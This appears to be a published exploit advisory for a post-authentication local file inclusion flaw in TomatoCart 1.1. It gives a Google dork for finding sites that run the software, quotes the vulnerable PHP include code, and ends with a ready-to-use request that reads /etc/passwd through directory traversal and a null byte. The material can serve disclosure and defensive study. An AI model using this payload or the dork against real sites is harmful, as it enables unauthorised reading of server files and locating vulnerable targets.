# Exploit Title: TomatoCart 1.1 PostAuth Local File Include # Google Dork: "Powered by TomatoCart" # Date: 25.10.2010 # Author: brain[pillow] # Software Link: http://www.tomatocart.com/ # Version: 1.1 ========================================================= # Vuln. code: if ($osC_Customer->isLoggedOn() === true) { if (isset($_REQUEST['module'])) { $module = $_REQUEST['module']; $osC_Language->load($module); } if (isset($_REQUEST['pdf'])) { $pdf = $_REQUEST['pdf']; } if (!empty($module) && !empty($pdf)) { if (file_exists('includes/modules/pdf/' . $pdf . '.php')) { include('includes/modules/pdf/' . $pdf . '.php'); $pdf_class = 'toC_' .ucfirst($pdf) . '_PDF'; $object = new $pdf_class(); $object ->render(); exit; } } } ========================================================= # Exploit: /pdf.php?module=1&pdf=../../../../../../../../../../../../../etc/passwd%00